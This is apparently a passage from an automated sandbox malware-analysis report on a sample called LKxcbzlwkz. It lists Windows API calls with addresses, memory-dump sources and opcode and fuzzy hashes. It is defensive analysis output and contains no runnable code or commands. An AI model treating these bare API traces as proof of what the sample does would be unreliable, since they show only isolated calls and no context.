                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48bed912f23612092a912c5be4ce8918b0696bdd3f38560407ee328223f716d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                                                                                                                                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$LabelVolume
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 2006950084-234962358
                                                                                                                                                                                                                                                            • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                                                            • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00449761
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 772068139-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: a8bf8344613a324865605a3c3a1dbedbe99a89b99ed919a4fa48337e9f4707c4
                                                                                                                                                                                                                                                            • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8bf8344613a324865605a3c3a1dbedbe99a89b99ed919a4fa48337e9f4707c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$_wcscpy
                                                                                                                                                                                                                                                            • String ID: 3, 3, 8, 1
                                                                                                                                                                                                                                                            • API String ID: 3469035223-357260408
                                                                                                                                                                                                                                                            • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                                                                                                                            • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• VariantInit.OLEAUT32(?), ref: 0047950F
• SysAllocString.OLEAUT32(00000000), ref: 004795D8
• VariantCopy.OLEAUT32(?,?), ref: 0047960F
• VariantClear.OLEAUT32(?), ref: 00479650
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2808897238-0
                                                                                                                                                                                                                                                            • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                                                            • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
APIs
• SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
• __itow.LIBCMT ref: 004699CD
  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
• SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
• __itow.LIBCMT ref: 00469A97
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
• Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
• Opcode Fuzzy Hash: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
• Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
APIs
• GetWindowRect.USER32(?,?), ref: 00449A4A
• ScreenToClient.USER32(?,?), ref: 00449A80
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
• Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
• Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
• Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
APIs
• ClientToScreen.USER32(00000000,?), ref: 0044169A
• GetWindowRect.USER32(?,?), ref: 00441722
• PtInRect.USER32(?,?,?), ref: 00441734
• MessageBeep.USER32(00000000), ref: 004417AD
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
• Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
• Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
• Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
• __isleadbyte_l.LIBCMT ref: 004208A6
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
APIs
• GetParent.USER32(?), ref: 004503C8
• DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
• DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
• DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Proc$Parent
• String ID:
• API String ID: 2351499541-0
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
APIs
• GetForegroundWindow.USER32(?,?,?), ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
• GetForegroundWindow.USER32 ref: 004743EE
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                                                                                                            • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                                                            • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00449519
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00449526
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2886238975-0
                                                                                                                                                                                                                                                            • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                                                                                                                            • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
